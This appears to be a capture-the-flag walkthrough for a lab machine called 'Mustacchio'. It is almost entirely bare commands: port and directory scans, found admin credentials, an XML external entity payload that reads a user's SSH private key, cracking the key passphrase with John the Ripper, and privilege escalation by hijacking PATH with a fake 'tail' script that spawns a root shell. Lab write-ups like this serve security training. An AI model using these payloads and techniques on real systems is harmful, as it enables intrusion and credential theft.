Mustacchio
Initial Scan
nmap -A $VICTIM
Scan all ports
TCP/80 - HTTP
TCP/8765 - HTTP
Initial Shell
Privilege Escalation
Last updated
nmap -A $VICTIMLast updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtgobuster dir -u http://$VICTIM:8765 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtUsername: admin
Password: bulldog19<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could\u2019ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could\u2019ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>python /opt/john/ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
chmod 600 id_rsa
ssh -v -i id_rsa barry@$VICTIM
Password: urieljamescd /home/joe
ls -lah
strings live_logcd /tmp
cat > tail << EOF
> #!/bin/bash
> /bin/bash -i
> EOF
chmod +x tail
export PATH=/tmp/:$PATH
/home/joe/live_log